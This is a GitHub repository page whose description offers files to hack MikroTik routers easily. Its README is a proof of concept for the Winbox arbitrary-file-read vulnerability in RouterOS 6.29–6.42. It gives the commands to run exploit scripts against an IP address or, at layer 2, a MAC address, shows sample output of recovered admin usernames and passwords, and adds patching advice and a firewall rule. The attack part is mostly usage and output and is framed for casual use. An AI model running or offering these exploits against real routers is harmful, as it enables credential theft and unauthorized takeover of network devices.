- Notifications
You must be signed in to change notification settings - Fork0
Aqui arquivos para rackear mikrotik facil.
License
NotificationsYou must be signed in to change notification settings
cristlei/-Mikrotik
Folders and files
| Name | Name | Last commit message | Last commit date | |
|---|---|---|---|---|
Repository files navigation
Proof of Concept of Winbox Critical Vulnerability
Arbitrary file read
https://n0p.me/winbox-bug-dissection/
Winbox (TCP/IP)
$ python3 WinboxExploit.py 172.17.17.17User: adminPass: Th3P4ssWordMAC server Winbox (Layer 2)
You can extract files even if the device doesn't have an IP address :-)
$ python3 MACServerDiscover.pyLooking for Mikrotik devices (MAC servers) aa:bb:cc:dd:ee:ff aa:bb:cc:dd:ee:aa$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ffUser: adminPass: Th3P4ssWordall versions from 6.29 (release date: 2015/28/05) to 6.42 (release date 2018/04/20) are vulnerable ..
- Update your RouterOS to the last version or Bugfix version
- Do not use Winbox and disable it :| it's nothing just a GUI for NooBs ..
- you may use some Filter Rules (ACL) to deny anonymous accesses to the Router
ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=dropEnjoy!